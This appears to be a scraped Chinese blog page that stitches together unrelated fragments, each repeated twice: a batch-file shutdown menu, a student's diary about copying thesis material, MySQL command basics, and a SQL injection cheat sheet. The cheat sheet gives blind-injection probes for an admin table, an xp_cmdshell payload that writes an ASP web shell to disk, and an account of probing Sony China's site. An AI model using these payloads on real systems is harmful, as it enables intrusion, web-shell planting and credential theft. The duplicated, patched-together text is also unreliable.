0
2006/12/29 
18:42 
572
@ECHO off
TITLE 自动关机程序 作者:廖晓青
:start
CLS
COLOR 1f
rem 使用COLOR命令对控制台输出颜色进行更改
MODE con: COLS=41 LINES=18
rem MODE语句为设定窗体的宽和高
set tm1=%time:~0,2%
set tm2=%time:~3,2%
set tm3=%time:~6,2%
ECHO %date% %tm1%点%tm2%分%tm3%秒
ECHO =========================================
ECHO 请选择要进行的操作,然后按回车
ECHO ───────────────
ECHO.
ECHO 1. 定时关机
ECHO 2. 倒计时关机
ECHO 3. 删除定时关机任务
ECHO 4. 查看任务状态
ECHO 5. 刷新当前时间
ECHO 6. 重新启动
ECHO 7. 锁定计算机
ECHO 8. 注销
ECHO 9. 退出
ECHO.
TITLE 自动关机程序 作者:廖晓青
:start
CLS
COLOR 1f
rem 使用COLOR命令对控制台输出颜色进行更改
MODE con: COLS=41 LINES=18
rem MODE语句为设定窗体的宽和高
set tm1=%time:~0,2%
set tm2=%time:~3,2%
set tm3=%time:~6,2%
ECHO %date% %tm1%点%tm2%分%tm3%秒
ECHO =========================================
ECHO 请选择要进行的操作,然后按回车
ECHO ───────────────
ECHO.
ECHO 1. 定时关机
ECHO 2. 倒计时关机
ECHO 3. 删除定时关机任务
ECHO 4. 查看任务状态
ECHO 5. 刷新当前时间
ECHO 6. 重新启动
ECHO 7. 锁定计算机
ECHO 8. 注销
ECHO 9. 退出
ECHO.
马上临近毕业了,毕业设计的任务下来都快1个月了,离交论文的时间越来越近,为了能顺利毕业,现在不得不没日没夜的加班。
因为偶不善于学习自己的专业
,所以自己做起来确实困难大了点, 再说题目也确实难了点,对于专科生来说要求高了点,不过老师指导的多,所以我们的课题已经有人做的差不多了,所以马上来个copy,没想到只是收集了大部分的资料,整理、排版的工作还得自己来,再说结论、绪论的东西用别人的有点不好啊,好不容易从下的论文上找了点可以用的东西放上去,可是偶的机子突然一个黑屏,罢工了!!
倒!!!!
大叫网管(因为偶们宿舍因为有电视的缘故,电给的时间不是很长,所以偶的电脑在10月刚开始的时候回家了!),网管sbxx的看了半天,没看出什么原因,这都是意料中的(因为他连怎么给windows设置密码都不知道!再倒),偶一气之下按了电源开关,因为刚开始以为偶一天的劳动成功还有恢复的可能,所以没敢重起,现在看起来没什么希望了!!原来是那个垃圾把老子电脑的电源给踩掉了,这里小夸一下中国的电路产品,掉了还有自动恢复的功能,一个字,强!!!!
没办法,只好从开始做了!!!
到了晚上7点左右的时候,终于整理的差不多了,肚子也饿的呱呱叫了,闪人先!!!!
因为偶不善于学习自己的专业
,所以自己做起来确实困难大了点, 再说题目也确实难了点,对于专科生来说要求高了点,不过老师指导的多,所以我们的课题已经有人做的差不多了,所以马上来个copy,没想到只是收集了大部分的资料,整理、排版的工作还得自己来,再说结论、绪论的东西用别人的有点不好啊,好不容易从下的论文上找了点可以用的东西放上去,可是偶的机子突然一个黑屏,罢工了!!倒!!!!
大叫网管(因为偶们宿舍因为有电视的缘故,电给的时间不是很长,所以偶的电脑在10月刚开始的时候回家了!),网管sbxx的看了半天,没看出什么原因,这都是意料中的(因为他连怎么给windows设置密码都不知道!再倒),偶一气之下按了电源开关,因为刚开始以为偶一天的劳动成功还有恢复的可能,所以没敢重起,现在看起来没什么希望了!!原来是那个垃圾把老子电脑的电源给踩掉了,这里小夸一下中国的电路产品,掉了还有自动恢复的功能,一个字,强!!!!
没办法,只好从开始做了!!!
到了晚上7点左右的时候,终于整理的差不多了,肚子也饿的呱呱叫了,闪人先!!!!
检测可否注入
http://127.0.0.1/xx?id=11 and 1=1 (正常页面)
http://127.0.0.1/xx?id=11 and 1=2 (出错页面)
检测表段的
http://127.0.0.1/xx?id=11 and exists (select * from admin)
检测字段的
http://127.0.0.1/xx?id=11 and exists (select username from admin)
检测ID
http://127.0.0.1/xx?id=11 and exists (select id from admin where ID=1)
检测长度的
http://127.0.0.1/xx?id=11 and exists (select id from admin where len(username)=5 and ID=1)
检测长度的
http://127.0.0.1/xx?id=11 and 1=1 (正常页面)
http://127.0.0.1/xx?id=11 and 1=2 (出错页面)
检测表段的
http://127.0.0.1/xx?id=11 and exists (select * from admin)
检测字段的
http://127.0.0.1/xx?id=11 and exists (select username from admin)
检测ID
http://127.0.0.1/xx?id=11 and exists (select id from admin where ID=1)
检测长度的
http://127.0.0.1/xx?id=11 and exists (select id from admin where len(username)=5 and ID=1)
检测长度的
1、 http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell 'echo ^ script language=VBScript runat=server^>execute request^("l"^)^ /script^> >c:\mu.asp';--
用^转义字符来写ASP文件的方法。
2、 http://192.168.1.5/display.asp?keyno=188 and 1=(select @@VERSION)
显示SQL系统版本:
Microsoft VBScript 编译器错误 错误 '800a03f6'
缺少 'End'
/iisHelp/common/500-100.asp,行242
Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Desktop Engine on Windows NT 5.0 (Build 2195: Service Pack 4) ' to a column of data type int.
/display.asp,行17
3、 在检测索尼中国的网站漏洞时,分明已经确定了漏洞存在却无法在这三种漏洞中找到对应的类型。偶然间我想到了在SQL语言中可以使用"in"关键字进行查询,例如"select * from mytable where id in(1)",括号中的值就是我们提交的数据,它的结果与使用"select * from mytable where id=1"的查询结果完全相同。所以访问页面的时候在URL后面加上") and 1=1 and 1 in(1"后原来的SQL语句就变成了"select * from mytable where id in(1) and 1=1 and 1 in(1)",这样就会出现期待已久的页面了。暂且就叫这种类型的漏洞为"包含数字型"吧,聪明的你一定想到了还有"包含字符型"呢。对了,它就是由于类似"select * from mytable where name in('firstsee')"的查询语句造成的。
用^转义字符来写ASP文件的方法。
2、 http://192.168.1.5/display.asp?keyno=188 and 1=(select @@VERSION)
显示SQL系统版本:
Microsoft VBScript 编译器错误 错误 '800a03f6'
缺少 'End'
/iisHelp/common/500-100.asp,行242
Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Desktop Engine on Windows NT 5.0 (Build 2195: Service Pack 4) ' to a column of data type int.
/display.asp,行17
3、 在检测索尼中国的网站漏洞时,分明已经确定了漏洞存在却无法在这三种漏洞中找到对应的类型。偶然间我想到了在SQL语言中可以使用"in"关键字进行查询,例如"select * from mytable where id in(1)",括号中的值就是我们提交的数据,它的结果与使用"select * from mytable where id=1"的查询结果完全相同。所以访问页面的时候在URL后面加上") and 1=1 and 1 in(1"后原来的SQL语句就变成了"select * from mytable where id in(1) and 1=1 and 1 in(1)",这样就会出现期待已久的页面了。暂且就叫这种类型的漏洞为"包含数字型"吧,聪明的你一定想到了还有"包含字符型"呢。对了,它就是由于类似"select * from mytable where name in('firstsee')"的查询语句造成的。
一、连接MYSQL。
格式: mysql -h主机地址 -u用户名 -p用户密码
1、例1:连接到本机上的MYSQL。
首先在打开DOS窗口,然后进入目录 mysqlbin,再键入命令mysql -uroot -p,回车后提示你输密码,如果刚安装好MYSQL,超级用户root是没有密码的,故直接回车即可进入到MYSQL中了,MYSQL的提示符是:mysql>
2、例2:连接到远程主机上的MYSQL。假设远程主机的IP为:110.110.110.110,用户名为root,密码为abcd123。则键入以下命令:
mysql -h110.110.110.110 -uroot -pabcd123
(注:u与root可以不用加空格,其它也一样)
3、退出MYSQL命令: exit (回车)
二、修改密码。
格式:mysqladmin -u用户名 -p旧密码 password 新密码
格式: mysql -h主机地址 -u用户名 -p用户密码
1、例1:连接到本机上的MYSQL。
首先在打开DOS窗口,然后进入目录 mysqlbin,再键入命令mysql -uroot -p,回车后提示你输密码,如果刚安装好MYSQL,超级用户root是没有密码的,故直接回车即可进入到MYSQL中了,MYSQL的提示符是:mysql>
2、例2:连接到远程主机上的MYSQL。假设远程主机的IP为:110.110.110.110,用户名为root,密码为abcd123。则键入以下命令:
mysql -h110.110.110.110 -uroot -pabcd123
(注:u与root可以不用加空格,其它也一样)
3、退出MYSQL命令: exit (回车)
二、修改密码。
格式:mysqladmin -u用户名 -p旧密码 password 新密码
